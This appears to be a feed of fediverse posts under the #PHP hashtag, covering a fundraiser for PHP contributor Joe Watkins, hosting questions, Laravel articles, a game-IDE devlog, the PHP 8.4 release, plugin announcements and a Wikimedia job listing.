Joe Watkins is a major contributor to PHP, so if you benefit from PHP, then you’re benefiting from Joe’s open source work.

Please support Joe and his family, as he deals with serious health issues.

https://www.gofundme.com/f/a-big-ask-from-a-big-community

I'd love to see something like GitHub Pages or Netlify that also supports #PHP…

What's the cheapest and easiest #PHP hosting service to use in 2024? I'm going to serve a website with three to four pages.

With the #Mastodon API, is there a way when posting to it, to get it to return the link of the new post? #PHP

You have been warned.

#Memes #Php #SoftwareDevelopment

Laravelプロジェクトに導入予定の便利ツールをご紹介！
https://qiita.com/hiroki_kawaguchi/items/1fc2ed13daffc06dff41?utm_campaign=popular_items&utm_medium=feed&utm_source=popular_items

#qiita #PHP #開発環境 #Laravel #開発生産性

Laravel から一歩先へ。クリーンアーキテクチャによる柔軟な設計パターン
https://qiita.com/ucan-lab/items/a9a5c55ce12a6d8752d3?utm_campaign=popular_items&utm_medium=feed&utm_source=popular_items

#qiita #PHP #Laravel #DDD #ドメイン駆動設計 #CleanArchitecture

This is one of the most useful tools I have built:

https://history.nix-packages.com

Working with multiple versions of whatever software you need for your legacy app is a breeze.

You want some specific version of #php #nodejs #golang or whatever else without it polluting your system? You're just one `nix-shell` command away!

#nix #nixos

when i was a kid, you could build a simple game or application by dragging and dropping a few UI controls, and gluing them together with a few dozen lines of BASIC or Pascal or HyperTalk. it might take 15 minutes, at most, to get your little character walking around on the screen. this is how we ended up with a lot of hilariously good and cheap shareware you could share on BBSes in the 90s.

for the past year i've been quietly working on building a software thingie that doesn't exist anymore. i've been building a software toolkit that's kinda like Visual Basic and HyperCard and Borland Delphi, designed for making tile-based 2d games.

i've been using it to build my own little goofy games, and improving on the drag'n'drop IDE as i figuring things out. it's not done yet, and has a long ways to go before it's ready for other people to start making their own little applications and games. think PICO-8 or ZZT if they had grown up on a steady diet of Windows 3.1 and GeoWorks Ensemble instead.

i'm really, really bad about polishing turds to infinity and never releasing them. to break that habit, i've built a mini-website for the IDE/Shareware Creation Kit. it's called Exigy, named like a bad 80s metal hair band or richard garriott game.

https://exigy.org

i'll be posting weekly blog/devlog updates there, so i don't irritate anyone with them on this account. there is an rss feed button at the top right if you hate my demonic php and css.

#shareware #ultima #php #blog #smolweb #zzt #indiedev #hypercard #vintageApple #exigy

I REALLY don't want to join #Bluesky and love it here on the fedi. But people keep telling me I just won't find enough people here to follow and engage with.

If you love #linux #WebDevelopment #php or #elixir #elixirlang #phoenixframework drop a comment here and retoot so I can follow you.

I really love the community here and want to find my people. :)

@syntaxseed @slightlyoff Browsers have done that with #CSS. I'd argue all CSS frameworks are obsolete now with how far CSS had come. But people still reach for tailwind or whatever, despite it being built for a CSS that doesn't exist anymore.

For JS, same problem but it's React. For #PHP, it's #Laravel.

Once a critical mass of people use something, it's almost impossible to get them to migrate to something better, because the network effect costs are too high.

And here we are.

@slightlyoff They should take the approach #PHP has taken over the last decade - rapid release of modernizing updates, eventually leaving the old behind.

Honestly I'm shocked with browsers being essentially down to a single monopoly now... why JS is still *almost* the same as it was 15 years ago! 🤦‍♀️

Just fix it #Chromium.... ffs.

#PHP 8.4 released https://www.php.net/

I am looking for a technical review of my doc to see if everything is understandable. https://github.com/bakame-php/http-structured-fields/tree/master/docs if you want to spend the night ready poetry please feel free to open PR to fix typos or to give advices on how to improve the documentation #php #oss #documentation

I just released my second @getkirby plugin!

Kirby Admin Bar adds a simple admin bar to your frontend which allows logged in users to:

1. Quickly edit the current page in the panel
2. Access important panel links from the frontend with a single click
3. See your logged in user account and role at a glance and easily access your profile settings

Get it here: https://github.com/Pechente/kirby-admin-bar

#getkirby #kirbycms #php #webdev

An #introduction post is probably appropriate. So: Hello from #norway !

I'm here hoping to find interesting #DIY #electronics and other nerdy projects, in addition to sharing my own stuff.

I've been fiddling with #esp32 microcontroller/WiFi modules for a while, and will probably post my share of esp32 related projects.

My primary programming languages are #php #cpp #javascript

I do #pcb design with #Kicad, simple 2D design with #qcad and 3D work in #freecad.

I write about some of my projects on my personal blog, https://espenandersen.no

My GitHub repository is found at https://github.com/espena

(Image from my garage workbench)

Wikimedia Foundation has a couple of #PHP software engineering positions open (one Senior-level, one Staff-level) on their Product Security team. Here’s the Senior:

https://job-boards.greenhouse.io/wikimedia/jobs/5890112?gh_src=58ef55971us

(It’s a position that I’ve talked myself out of even applying for because security hasn’t ever been a focus for me.)

#GetFediHired

ActivityBot - single file PHP activity pub bot server

https://gitlab.com/edent/activity-bot/

Discussions: https://discu.eu/q/https://gitlab.com/edent/activity-bot/

#php #programming

Blasp: A Powerful #Laravel Package for Profanity Filtering #PHP

https://github.com/Blaspsoft/blasp

#RiotJS で #WebComponents なサンプル作りを昨夜試して、色々 riotjs/custom-elements のバグっぽい挙動も報告できたので良かったんだけど、#WebComponents の属性値に基本テキストしか渡せないのは、やはり感覚的にはちょっと不便に感じる時あるな…props バケツリレーすればとりあえずなんとかなるかなみたいになっちゃってる自分が良くないかもなので別のパターンを学ぶ良いきっかけかもしれないけど。
#CSS が外部に伝搬しない #shadowDOM は使い方次第ではすごい強力な気はしている。

#WebComponentsb の template の書きづらさは Riot みたいなコンポーネントベースのフレームワークを使って解決するほうがよさそうだなと思ってるけど、標準技術の中でもう少し柔軟に書けるようになる予定とかないんだろうか…構造がある程度複雑になると、フレームワーク使わずにやろうとすると #HTML 側に template で書いておいて #JS 側から getElementById するみたいなやり方しか自分は思いついてないんだけど、できればコンポーネントはコンポーネントとして別ファイル化したいし… #PHP とかフロント以外のところでコンポーネント用の template を分けておけばいいのかもしれないけどなんかそれもなあとか考え事をしながら人間ドックに向かっている朝。